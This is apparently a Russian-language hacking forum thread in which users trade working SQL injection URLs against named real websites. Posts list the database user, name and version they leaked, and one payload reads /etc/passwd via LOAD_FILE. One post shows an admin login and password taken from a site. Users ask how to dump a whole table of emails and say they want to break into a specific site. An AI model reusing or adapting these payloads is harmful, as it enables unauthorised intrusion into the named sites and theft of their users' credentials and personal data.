Магазин велосипедов Code: http://www.velo-mag.ru/index.php?action=page&id=-12345+union+select+1,2,3,4,5,6,7,8/* USER: assortif_velo@localhost DATABASE: assortif_velo VERSION: 5.0.24a 18 таблиц: stella_pages, stella_news, fb_pages, VIEWS, USER_PRIVILEGES, TRIGGERS, TABLE_PRIVILEGES, TABLE_CONSTRAINTS, TABLES, STATISTICS, SCHEMA_PRIVILEGES, SCHEMATA, ROUTINES, KEY_COLUMN_USAGE, COLUMN_PRIVILEGES, COLUMNS, COLLATION_CHARACTER_SET_APPLICABILITY, COLLATIONS, CHARACTER_SETS. Code: http://www.ik-ki.nl/?id=14&subid=30&action=bekijk&nieuws=-12345+union+select+1,2,3,4/* USER: ikki_ikki@localhost DATABASE: ikki_db VERSION: 4.1.22 Code: http://www.icppc.pl/pl/index.php?id=-12345+union+select+1,2,3/* После запроса появляются еще ошибки, поэтому чуть не упустил из виду, что отображается 3 поле. USER: icppc_jakub@localhost DATABASE: icppc_jakub VERSION: 4.1.21-standard-log
www.e1.ru: /etc/passwd/ http://www.e1.ru/business/conference/yarmarka/read.php?theme=-1&question=-1'+union+select+1,2,3,4,LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100))/* www.sermet.ru: http://www.sermet.ru/index.php?idpage=2&idnews=-1+union+select+1,2,3,4,5+from+users/* admin:admin pass:140108
www.uph.ru: http://www.uph.ru/inner.php?page=reklama1&top=-1+union+select+1,2/* www.rns-soft.ru: http://www.rns-soft.ru/?action=projects&id=-1+union+select+1,2,3,4+from+news/*
привет., у меня такая проблема, я пока в скьюэл не очень, поэтому не могу понять как получить доступ к базе мыл сайта: ну есть сайт допустим сайт www.xxxxx.com с бажным скриптом, в строке URL ввожу :. www.xxxxx.com/index.php?l=2&id=-1+union+select+1,aes_decrypt(aes_encrypt(email,0x7 1),0x71)+from+users+limit+40000,1/*&s=3 вот ето, но он выдает ток по 1 мылу, в зависимости от того что ввел перед ,1/*&s=3. Например ввожу перед ,1/*&s=3 число 10000 выдает одно мыло , ввожу перед ,1/*&s=3 число 40000 выдает другое, и тд, но по 1, а как сделать чтоб всю базу просмотреть? или выкачать, может что то добавить к етому коду?
Code: http://www.bayraktaremlakinsaat.com/index.php?detay=detaylar&x=&id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* USER: bayrakta_admin@localhost DATABASE: bayrakta_emlakdb VERSION: 4.1.21-standard Code: http://www.ta.fi/kohde_aso/?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* USER: webigurut@localhost DATABASE: kampat VERSION: 4.1.21-log
Code: http://www.cdrlabs.com/articles/index.php?articleid=-3+union+select+concat_ws(0x3a,username,password)+from+users+limit+1,1
herb4all.ru Code: http://www.herb4all.ru/index.php?group=1000+union+select+version()1,2,3,4/* Нету сил копать дальше
belexpocentr.ru Code: http://www.belexpocentr.ru/show.php?id=-1+union+select+1,2,3,4,5,user(),7,database(),version(),10,11,12,13,14,15,16,17,18,19,20,21/*
C ХЕРболайфом тоже не получается((( _http://www.herb4all.ru/index.php?group=-1000+union+select+concat(name,0x3a,password)+from+users/* Пустая страница((( а так хочеться именно его взломать. Блин там один столбец!!!
Code: http://gazeta.etatar.ru/base/person.php?id_person=-1+union+select+1,2,3,4,concat_ws(0x3b,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16/* Code: http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(0x3b,user(),database(),version())/*
